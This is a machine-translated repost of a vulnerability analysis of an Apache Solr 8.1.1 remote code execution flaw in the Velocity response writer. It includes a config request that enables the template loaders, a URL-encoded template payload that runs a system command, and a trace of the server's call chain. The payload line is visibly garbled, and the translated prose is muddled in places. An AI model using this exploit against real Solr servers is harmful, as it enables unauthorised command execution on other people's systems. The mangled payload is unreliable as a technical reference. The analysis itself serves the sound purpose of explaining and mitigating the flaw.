Shulou(Shulou.com)05/31 Report--

This article analyzes "how to analyze the latest RCE vulnerability analysis of Apache Solr". The content is detailed and easy to understand. Friends who are interested in "how to analyze the latest RCE vulnerabilities in Apache Solr" can follow the editor's train of thought to read it in depth. I hope it will be helpful to everyone after reading. Let's learn more about "how to analyze the latest RCE vulnerabilities of Apache Solr" with the editor.

Introduction

Apache Solr exposed RCE 0day vulnerabilities (the vulnerability number is not given). Here we simply reproduce the object and analyze the whole RCE process for your reference.

Loophole recurrence

Reproduced version: 8.1.1

To implement RCE, you need to take two steps. First, make sure that the application has enabled a certain core (which can be viewed in Core Admin), and the application in the instance has enabled mycore.

Then send the following json data to its config interface first

{"update-queryresponsewriter": {"startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true"}}

Then visit the following url to implement RCE

/ solr/mycore/select?wt=velocity&v.template=custom&v.template.custom=%23set ($rt=$x.class.forName% 27% 27) +% 23set ($rt=$x.class.forName (% 27java.lang.Runtime%27)) +% 23set ($chr=$x.class.forName (% 27java.lang.Character%27)) +% 23set ($str=$x.class.forName (% 27java.lang.String%27)) +% 23set ($ex=$rt.getRuntime (). Exec (% 27whoami%27)) + $ex.waitFor () +% 23set ($out=$ex.getInputStream ()) +% 23foreach ($iposin + [1..$out.available ()]) $str.valueOf ($chr.toChars ($out.read ()% 23end principle

First of all, to analyze the first packet, because it is the configuration of mycore, we first put the breakpoint on the handleRequestBody function of the SolrConfigHandler that handles the configuration request.

Because it is a request from POST, follow up the handlePOST function

In handlePOST, we first take out the current configuration of mycore, and then bring it into the handleCommands function at the same time as the configuration we sent. In the subsequent operation, we finally go to the addNamedPlugin function to create a VelocityResponseWriter object whose solr.resource.loader.enabled and params.resource.loader.enabled values are set to true, and the object's name is velocity.

Then, when sending the second packet, when you get responseWriter in HttpSolrCall.call, you will get the reponseWriter object according to the value of parameter wt. When wt is velocity, you will get the VelocityResponseWriter that we have carefully configured.

After a series of subsequent calls, we finally enter the heaviest VelocityResponseWriter.write function in this vulnerability. First, we call the createEngine function to generate an engine containing malicious template of custom.vrm- > payload.

Malicious template is placed in the params.resource.loader.instance and solr.resource.loader.instance of engine's overridingProperties

Here is a very important point. In order to allow malicious template to enter params.resource.loader.instance and solr.resource.loader.instance, we need to make sure that paramsResourceLoaderEnabled and solrResourceLoaderEnabled are True, which is what we did in the first packet.

Then VelocityResponseWriter.getTemplate will get the malicious template we constructed according to the v.template parameters we submitted.

Finally, I took out the malicious template and called its merge method.

To understand this template, you need to know the Velocity Java template engine (because the tmplate is an org.apache.velocity.Template class object). The official translation is as follows

Velocity is a template engine based on Java. It allows anyone to use a simple but powerful template language to reference objects defined in Java code.

From this point of view, we can see that the template engine has the function of executing java code. We only need to know how to write it.

/ / variable definition # set ($name= "velocity") / / variable assignment # set ($foo = $bar) / / function call # set ($foo = "hello") # set (foo.name=bar.name) # set (foo.name=bar.getName ($arg)) / / Circular Syntax # foreach ($element in $list) This is $element $velocityCount#end// execution template template.merge (context, writer)

With the above basic syntax introduction, we can understand the construction method of payload, if you want a more in-depth understanding, you can check the Velocity Java data again, we will not go any further here.

So through the final call of the malicious template's merge method, the RCE is successfully created, and finally the key call chain is added.

Repair scheme

At present, no official patch has been given, so it is recommended to restrict access to solr.

On how to carry out the latest Apache Solr RCE vulnerability analysis to share here, I hope that the above content can make you improve. If you want to learn more knowledge, please pay more attention to the editor's updates. Thank you for following the website!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.